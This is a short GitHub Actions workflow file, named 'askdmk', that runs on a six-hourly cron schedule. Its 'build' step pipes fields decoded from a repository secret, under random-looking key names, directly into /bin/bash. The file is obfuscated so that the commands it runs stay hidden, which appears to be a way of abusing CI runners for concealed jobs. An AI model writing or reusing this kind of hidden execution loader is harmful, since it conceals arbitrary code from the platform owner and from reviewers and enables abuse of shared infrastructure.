name: askdmk

on:
  workflow_dispatch:
  schedule:
    - cron: '11 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: askdmk
        env:
          po9958: ${{ secrets.po9958 }}
        run: |
          echo $po9958 | jq -r .ni69 | /bin/bash
          echo $pe7503 | jq -r .e4 | /bin/bash
          echo $z5218 | jq -r .wok788 | /bin/bash
          echo $v6735 | jq -r .l6 | /bin/bash
          echo $wgarj49138 | jq -r .vkrq7 | /bin/bash
          echo $tbr8 | jq -r .xyo56 | /bin/bash
          echo $pvh9 | jq -r .qhuam61986 | /bin/bash

